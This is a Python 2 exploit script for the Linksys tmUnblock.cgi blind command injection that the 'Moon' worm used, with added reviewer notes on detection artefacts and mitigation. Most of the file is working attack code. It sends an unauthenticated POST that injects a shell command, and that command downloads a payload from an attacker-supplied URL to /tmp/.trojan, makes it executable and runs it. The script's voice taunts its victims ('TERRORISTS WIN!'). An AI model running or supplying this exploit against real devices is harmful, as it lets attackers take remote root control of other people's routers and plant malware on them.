#!/usr/bin/python2
"""
Linksys Remote Root Exploit
infodox - insecurety research

This is the exploit this "Moon" worm uses. Trivial blind cmd injection :)
This version crippled - uses wget.

Twitter: @info_dox
Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku

NOTE(review): what this script actually sends, for anyone triaging it.
A single HTTP POST to <target>/tmUnblock.cgi whose ``ttcp_ip`` form field
carries a shell command wrapped in backticks. No credentials, cookies or
session token are attached to the request, so the endpoint is presumably
reachable unauthenticated on affected firmware (inferred from the code; the
script never checks). The response is discarded, so the injection is
"blind" - nothing here confirms whether it worked.

Detection / hunting artefacts visible in this code:
  * POST to ``/tmUnblock.cgi`` with a backtick (`) in the ``ttcp_ip`` value
    and ``StartEPI=1`` in the body.
  * Fixed User-Agent ``Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10)
    3.51 [en]`` on that request.
  * On the device: a hidden, world-executable file at ``/tmp/.trojan`` and
    an outbound fetch (``wget``) of the payload URL shortly after the POST.
Mitigation is firmware-side (the CGI must not pass form input to a shell);
blocking access to the management interface from untrusted networks limits
exposure until the device is patched.
"""
import requests
import sys


def banner():
    # ANSI-coloured ASCII art; the line layout of the original art was lost
    # when this listing was flattened, the bytes below are as preserved.
    print """\x1b[0;32m .____ .__ __ | | |__| ____ | | __ _________.__. ______ | | | |/ \| |/ / / ___< | |/ ___/ | |___| | | \ < \___ \ \___ |\___ \ |_______ \__|___| /__|_ \/____ >/ ____/____ > \/ \/ \/ \/ \/ \/ You are the weakest link. Goodbye. Linksys remote root - infodox - Insecurety Research. Version 2: Crippled (wget shelldrop only) \x1b[0m"""


def upShell(wget_url, target):
    """ This works with the normal busybox wget at least, and worked in testing

    Builds the three-step shell one-liner (download to /tmp/.trojan, make it
    executable, run it) and hands it to execute_command().  ``wget_url`` is
    interpolated into the command string unquoted, so the URL itself must not
    contain shell metacharacters or the command breaks.  Nothing is returned
    and no success check is made - the two prints are unconditional.
    """
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" %(wget_url)
    print "{+} Planting Bomb!"
    execute_command(target=target, command=cmd)
    print "{!} TERRORISTS WIN!"


def execute_command(target, command):
    """Send one POST to <target>/tmUnblock.cgi with ``command`` injected.

    ``command`` is wrapped as ``-h `command``` and placed in the ``ttcp_ip``
    field; the backticks are shell command substitution, which only has an
    effect if the CGI hands that field to a shell unescaped (this is the
    assumed vulnerability; the script does not verify it).  The other form
    fields are fixed values whose meaning is not established here.
    ``target`` is used as a URL prefix verbatim (expected form:
    ``http://host``, no trailing slash).  The HTTP response is never inspected:
    ``mad_hax`` is assigned and dropped, so status codes and errors short of a
    raised exception are silently ignored.
    """
    url = target + "/tmUnblock.cgi"
    injection = "-h `%s`" %(command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '', 'change_action': '', 'action': '', 'commit': '0', 'ttcp_num': '2', 'ttcp_size': '2', 'ttcp_ip': injection, 'StartEPI': '1'}
    # Static User-Agent - a reliable signature for this particular tool.
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)


def main(args):
    # ``args`` is accepted but ignored; argument handling reads sys.argv
    # directly.  argv[1] is the target base URL, argv[2] the payload URL.
    banner()
    if len(sys.argv) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" %(sys.argv[0]))
    upShell(wget_url=sys.argv[2], target=sys.argv[1])


if __name__ == "__main__":
    main(sys.argv)